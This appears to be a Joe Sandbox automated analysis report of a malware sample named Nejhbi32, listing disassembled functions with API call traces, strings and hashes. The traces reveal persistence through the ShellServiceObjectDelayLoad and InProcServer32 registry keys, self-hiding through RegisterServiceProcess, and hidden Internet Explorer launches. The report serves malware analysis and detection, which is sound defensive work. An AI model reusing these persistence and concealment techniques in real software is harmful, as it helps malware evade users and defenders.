                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE
                            Function 00403619 Relevance: 7.6, APIs: 5, Instructions: 58filememoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 60 403619-40364c CreateFileA 61 403664-403682 GetFileSize LocalAlloc 60->61 62 40364e-403652 60->62 63 403684-40368a 61->63 64 40368c-40368f 61->64 65 403654-403657 62->65 66 40365a-40365c 62->66 67 403692-4036ab ReadFile CloseHandle 63->67 64->67 65->66 66->61 68 4036ae-4036b2 66->68 67->68
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D
                            Function 00403F68 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 135fileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Ogjdllpi,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Ogjdllpi,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Ogjdllpi,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Ogjdllpi,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Ogjdllpi$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-1498091450
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69
                            Function 00403CE9 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 197COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD
                            Function 00404148 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754
                            Function 0040365E Relevance: 6.0, APIs: 4, Instructions: 30memoryfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E
                            Function 00407980 Relevance: 4.5, APIs: 3, Instructions: 47stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 85 4079ac-4079af 81->85 89 4079e1-4079e3 82->89 87 4079c3-4079c8 83->87 84->83 86 4079b3 84->86 90 4079b1 85->90 91 4079ab 85->91 86->80 87->82 92 4079ca-4079cd 87->92 90->82 91->85 92->82 93 4079c2 92->93 93->87
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B
                            Function 00401219 Relevance: 3.0, APIs: 2, Instructions: 36COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F
                            Function 0040121F Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Non-executed Functions

                            Function 00405133 Relevance: 65.0, APIs: 28, Strings: 9, Instructions: 238stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1981311226.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.1981277503.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981341185.000000000042A000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981406801.000000000042E000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981476066.000000000042F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981508164.0000000000436000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1981572847.0000000000438000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Nejhbi32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            Function 00405C09 Relevance: 59.7, APIs: 25, Strings: 9, Instructions: 230stringfilesleepCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
